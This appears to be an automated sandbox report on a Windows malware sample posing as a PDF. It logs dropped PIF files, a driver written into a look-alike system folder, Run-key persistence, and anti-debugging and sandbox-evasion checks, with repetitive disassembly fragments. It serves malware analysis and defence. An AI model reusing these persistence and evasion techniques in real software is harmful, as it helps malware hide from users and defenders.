Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: C:\Users\Public\Libraries\Cpbxcxnx.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: C:\Users\Public\Libraries\xnxcxbpC.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: \delivery confirmation forms - contact form ts4047117 pdf.exe
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: \delivery confirmation forms - contact form ts4047117 pdf.exe
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: \delivery confirmation forms - contact form ts4047117 pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: \delivery confirmation forms - contact form ts4047117 pdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: C:\Users\Public\Libraries\Cpbxcxnx.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	File created: C:\Users\Public\Libraries\xnxcxbpC.pif			Jump to dropped file

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx			Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx			Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CEA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02CEA95C

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2BC0000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2BC1000 memory commit 500178944	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2BEC000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2BED000 memory commit 500199424	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2C1E000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2D16000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2D18000 memory commit 500015104	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2CD0000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2CD1000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2CFC000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2CFD000 memory commit 500199424	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2D2E000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2E26000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: 2E28000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2CB0000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2CB1000 memory commit 500178944	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2CDC000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2CDD000 memory commit 500199424	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2D0E000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2E06000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: 2E08000 memory commit 500015104	Jump to behavior

Source: C:\Users\Public\Libraries\xnxcxbpC.pif

Code function: 5_2_22AB096E rdtsc

5_2_22AB096E

Source: C:\Users\Public\Libraries\xnxcxbpC.pif	API coverage: 0.7 %
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	API coverage: 0.3 %

Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 2644	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 4620	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 3424	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02CD58B4

Source: Cpbxcxnx.PIF, 0000000D.00000002.2467965388.000000000086E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: Cpbxcxnx.PIF, 00000009.00000002.2355700970.000000000087E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

API call chain: ExitProcess graph end node

graph_0-25521

Source: C:\Users\Public\Libraries\xnxcxbpC.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CEEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02CEEBF0

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Process queried: DebugPort	Jump to behavior

Source: C:\Users\Public\Libraries\xnxcxbpC.pif

Code function: 5_2_22AB096E rdtsc

5_2_22AB096E

Source: C:\Users\Public\Libraries\xnxcxbpC.pif

Code function: 5_2_00417B33 LdrLoadDll,

5_2_00417B33

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CE87A0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CE87A0

Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov ecx, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]	5_2_22B062A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]	5_2_22AF0283
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]	5_2_22AF0283
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]	5_2_22AF0283
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE284 mov eax, dword ptr fs:[00000030h]	5_2_22AAE284
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE284 mov eax, dword ptr fs:[00000030h]	5_2_22AAE284
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]	5_2_22A802E1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]	5_2_22A802E1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]	5_2_22A802E1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]	5_2_22A7A2C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]	5_2_22A7A2C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]	5_2_22A7A2C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]	5_2_22A7A2C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]	5_2_22A7A2C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6823B mov eax, dword ptr fs:[00000030h]	5_2_22A6823B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]	5_2_22A74260
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]	5_2_22A74260
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]	5_2_22A74260
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6826B mov eax, dword ptr fs:[00000030h]	5_2_22A6826B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2A250 mov eax, dword ptr fs:[00000030h]	5_2_22B2A250
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2A250 mov eax, dword ptr fs:[00000030h]	5_2_22B2A250
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF8243 mov eax, dword ptr fs:[00000030h]	5_2_22AF8243
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF8243 mov ecx, dword ptr fs:[00000030h]	5_2_22AF8243
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A250 mov eax, dword ptr fs:[00000030h]	5_2_22A6A250
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76259 mov eax, dword ptr fs:[00000030h]	5_2_22A76259
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9438F mov eax, dword ptr fs:[00000030h]	5_2_22A9438F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9438F mov eax, dword ptr fs:[00000030h]	5_2_22A9438F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]	5_2_22A6E388
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]	5_2_22A6E388
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]	5_2_22A6E388
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]	5_2_22A68397
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]	5_2_22A68397
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]	5_2_22A68397
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]	5_2_22A803E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA63FF mov eax, dword ptr fs:[00000030h]	5_2_22AA63FF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]	5_2_22A8E3F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]	5_2_22A8E3F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]	5_2_22A8E3F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B143D4 mov eax, dword ptr fs:[00000030h]	5_2_22B143D4
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B143D4 mov eax, dword ptr fs:[00000030h]	5_2_22B143D4
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A3C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]	5_2_22A783C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]	5_2_22A783C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]	5_2_22A783C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]	5_2_22A783C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]	5_2_22B1E3DB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]	5_2_22B1E3DB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E3DB mov ecx, dword ptr fs:[00000030h]	5_2_22B1E3DB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]	5_2_22B1E3DB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF63C0 mov eax, dword ptr fs:[00000030h]	5_2_22AF63C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2C3CD mov eax, dword ptr fs:[00000030h]	5_2_22B2C3CD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]	5_2_22AAA30B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]	5_2_22AAA30B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]	5_2_22AAA30B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6C310 mov ecx, dword ptr fs:[00000030h]	5_2_22A6C310
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A90310 mov ecx, dword ptr fs:[00000030h]	5_2_22A90310
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1437C mov eax, dword ptr fs:[00000030h]	5_2_22B1437C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3A352 mov eax, dword ptr fs:[00000030h]	5_2_22B3A352
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B18350 mov ecx, dword ptr fs:[00000030h]	5_2_22B18350
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]	5_2_22AF2349
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov ecx, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]	5_2_22AF035C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B360B8 mov eax, dword ptr fs:[00000030h]	5_2_22B360B8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B360B8 mov ecx, dword ptr fs:[00000030h]	5_2_22B360B8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B080A8 mov eax, dword ptr fs:[00000030h]	5_2_22B080A8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7208A mov eax, dword ptr fs:[00000030h]	5_2_22A7208A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_22A6A0E3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A780E9 mov eax, dword ptr fs:[00000030h]	5_2_22A780E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF60E0 mov eax, dword ptr fs:[00000030h]	5_2_22AF60E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6C0F0 mov eax, dword ptr fs:[00000030h]	5_2_22A6C0F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB20F0 mov ecx, dword ptr fs:[00000030h]	5_2_22AB20F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF20DE mov eax, dword ptr fs:[00000030h]	5_2_22AF20DE
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06030 mov eax, dword ptr fs:[00000030h]	5_2_22B06030
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A020 mov eax, dword ptr fs:[00000030h]	5_2_22A6A020
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6C020 mov eax, dword ptr fs:[00000030h]	5_2_22A6C020
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF4000 mov ecx, dword ptr fs:[00000030h]	5_2_22AF4000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]	5_2_22A8E016
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]	5_2_22A8E016
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]	5_2_22A8E016
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]	5_2_22A8E016
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9C073 mov eax, dword ptr fs:[00000030h]	5_2_22A9C073
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A72050 mov eax, dword ptr fs:[00000030h]	5_2_22A72050
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6050 mov eax, dword ptr fs:[00000030h]	5_2_22AF6050
